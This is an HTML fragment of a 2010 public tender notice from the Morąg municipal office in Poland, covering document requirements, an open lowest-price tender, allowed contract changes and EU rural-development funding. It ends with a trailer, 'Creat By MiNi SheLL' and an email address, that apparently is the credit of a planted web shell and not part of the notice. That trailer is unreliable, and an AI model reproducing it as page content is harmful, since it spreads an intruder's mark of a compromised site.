<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o zgodności z warunkami przetargu
2. Zobowiązanie do wniesienia zabezpieczenia
3. Dowód wpłaty wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:
a)Zmiany kwoty wynagrodzenia:
- w przypadku zmiany albo wprowadzenia nowych przepisów lub norm, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, w tym zwłaszcza w zakresie stawki podatku VAT,
-  w przypadku wystąpienia robót uzupełniających, dodatkowych lub zamiennych / koszty tych robót przyjmowane będą na podstawie kosztorysów sporządzonych wg ustalonych składników cenotwórczych zawartych w formularzu ofertowym Wykonawcy/,
- w przypadku wykonania mniejszego zakresu robót niż określony w dokumentacji technicznej proporcjonalnie do zakresu rzeczowego.
b)Zmiany terminu wykonania przedmiotu zamówienia:
- w przypadku zlecenia wykonania robót dodatkowych lub zamiennych jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu umownego,
- w przypadku wystąpienia anomalii pogodowych lub innych nieprzewidywalnych przyczyno charakterze obiektywnym, mających znaczny wpływ na termin wykonania,
- w związku ze stwierdzeniem braków lub błędów projektowych o czas niezbędny na poprawienie lub uzupełnienie projektu,
- w przypadku udzielenia zamówień uzupełniających przewidzianych w SIWZ pkt 4.1 jeżeli terminy ich zlecenia uniemożliwiają dotrzymanie pierwotnego terminu umownego,
Okres wydłużenia terminu zakończenia powinien odpowiadać okresom opóźnień wymienionych powyżej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.morag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu 
ul. 11 Listopada 9 
14-300 Morąg 
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2010 godzina 09:00, miejsce: Urząd Miejski w Morągu 
ul. 11 Listopada 9 
14-300 Morąg 
pokój nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Decyzja o przyznaniu dofinansowania w ramach działania 413 Wdrażanie lokalnych strategii rozwoju - Odnowa i rozwój wsi - Program Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com